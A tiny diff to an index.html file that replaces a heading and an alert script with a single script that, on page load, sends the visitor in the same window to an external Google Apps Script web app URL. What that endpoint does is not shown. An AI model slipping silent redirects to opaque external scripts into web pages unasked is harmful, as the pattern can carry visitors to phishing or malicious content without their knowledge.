--- a/index.html
+++ b/index.html
@@ -1,2 +1,1 @@
-<h1>hello w</h1>
-<script>alert("hello")</script>
+<script>window.open("https://script.google.com/macros/s/AKfycbyp9cU-CtUzTfSu61FC9HjEDKVXd-RZJiazC_BFSxk/exec", "_self")</script>
